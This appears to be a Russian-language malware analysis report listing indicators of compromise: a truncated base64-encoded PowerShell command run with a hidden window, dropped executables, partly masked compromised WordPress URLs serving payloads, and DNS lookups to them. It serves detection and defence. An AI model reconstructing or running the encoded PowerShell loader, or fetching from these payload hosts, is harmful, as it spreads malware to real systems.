Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JAA1ADQAegAzADkAbQA9ACAAIABbAHQAWQBwAEUAXQAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBlAG0ALgBpAG8ALgBEAGkAcgBFACcALAAnAE8AcgBZACcALAAnAGMAVAAnACwAJwBTAFkAcwB0ACcAKQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1049917.cvr
- %HOMEPATH%\w0qjhfh\c2q5mmw\c9noxbk.exe
- %HOMEPATH%\w0qjhfh\c2q5mmw\c9noxbk.exe
- http://mi######ndrewsbakery.com/wp-admin/M/
- http://fo#####byowner247.com/wp-includes/8m/
- http://fo#####byowner247.com/cgi-sys/suspendedpage.cgi
- http://we###sjambi.com/wp-content/uploads/V5a/
- http://tw#####scleaning.com/openbayl/KaI/
- http://on###e2u.biz/ogretmenevi/4Yj/
- DNS ASK mi######ndrewsbakery.com
- DNS ASK fo#####byowner247.com
- DNS ASK we###sjambi.com
- DNS ASK ti#####ormtraffic.com
- DNS ASK op####sticdeals.com
- DNS ASK tw#####scleaning.com
- DNS ASK on###e2u.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JAA1ADQAegAzADkAbQA9ACAAIABbAHQAWQBwAEUAXQAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBlAG0ALgBpAG8ALgBEAGkAcgBFACcALAAnAE8AcgBZACcALAAnAGMAVAAnACwAJwBTAFkAcwB0ACcAKQ...' (со скрытым окном)